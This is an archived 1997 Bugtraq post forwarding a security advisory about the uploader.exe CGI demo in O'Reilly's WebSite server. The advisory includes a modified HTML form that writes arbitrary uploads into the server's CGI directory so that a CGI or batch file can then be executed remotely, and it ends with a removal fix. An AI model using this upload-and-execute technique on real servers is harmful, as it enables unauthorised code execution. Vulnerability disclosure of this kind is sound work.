Bugtraq mailing list archives
[Alert] Website's uploader.exe (from demo) vulnerable
From: aleph1 () DFW NET (Aleph One)
Date: Thu, 4 Sep 1997 16:59:12 -0500
---------- Forwarded message ---------- Date: Thu, 4 Sep 1997 21:38:57 +0200 From: Herman de Vette <herman () INFO NL> To: NTBUGTRAQ () NTADVICE COM Subject: [Alert] Website's uploader.exe (from demo) vulnerable [Alert] Website's uploader.exe (from demo) vulnerable Check out what I found today (hope it's not an known bug yet) O'reilly's webserver 'website' contains a demopackage that contains the cgi-program uploader.exe. The following html-page was included with it: ---------------------------------------- <HTML><HEAD><TITLE>Upload a File</TITLE></HEAD> <BODY> <H1>Upload a file</H1> <hr> <h2>NOTE: Your browser must support file uploading.</H2> <FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="/cgi-win/uploader.exe/Uploads/"> <PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required) Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required) <b>NOTE:</b> If you don't see a "browse" button below, your browser doesn 't support form-based file uploading. Netscape 2.0 and later have this support. File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40> File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required) <INPUT TYPE=SUBMIT VALUE="Upload Now"> </FORM> <HR> <A HREF="mailto:..."> <address>...</address> </A></BODY></HTML> ----------------------------------------- The program uploader.exe doesn't check anything at all. If you're lucky you're running windows NT and have put only "read/execute access" on cgi-win and other executable paths. Otherwise (win95) you have a real problem. You could create a CGI-program, next you change the HTML-file a little like this: ----------------------------------------- <HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD> <BODY> <FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/"> <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo"> <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo () bar com> File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40> <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem"> <INPUT TYPE=SUBMIT VALUE="Upload Now"> </FORM> </BODY></HTML> ------------------------------------------ open the html-file in your browser, select a nice CGI-file to upload And run that CGI-program remotely. (No need to tell you what this CGI-program could do, could be .bat file too in one of website's other cgi-directories) SOLUTION: remove uploader.exe, delete it, empty your trash bin and use ftp for file-upload Herman de Vette herman () info nl
Current thread:
- Pine's re-occuring nightmare jericho () DIMENSIONAL COM (Sep 01)
- MS responds to Exchange Server 5.0 POP3 Security problem Manley, Jim W (Sep 01)
- Re: Pine's re-occuring nightmare Mark Crispin (Sep 01)
- HP UX Bug :) Leonid S Knyshov (Sep 01)
- Re: HP UX Bug :) Brian Mitchell (Sep 02)
- in.comsat DoS vulnerability Andrew Hobgood (Sep 02)
- You can find jizz.c here T o r g (Sep 03)
- You can find jizz.c here anonymous () ANONYMOUS ORG (Sep 03)
- [linux-security] Announce: chkexploit 1.13 (fwd) iON BARRiER (Sep 04)
- Re: [linux-security] Announce: chkexploit 1.13 (fwd) W.C. Epperson (Sep 04)
- [Alert] Website's uploader.exe (from demo) vulnerable Aleph One (Sep 04)
- Overflow in one of Apache 1.1.1 (maybe later too)'s modules Matt Conover (Sep 04)
- Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Artur Pydo - EuroBretagne (Sep 05)
- Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Marc Slemko (Sep 05)
- Announcement: Phrack 51 Nate (Sep 01)
- Pine has a few more problems... dynamo () IME NET (Sep 01)
- SNI-18: Vacation Vulnerability Secure Networks Inc. (Sep 01)
- SNI-18: Vacation Vulnerability ggajic () FREENET NETHER NET (Sep 02)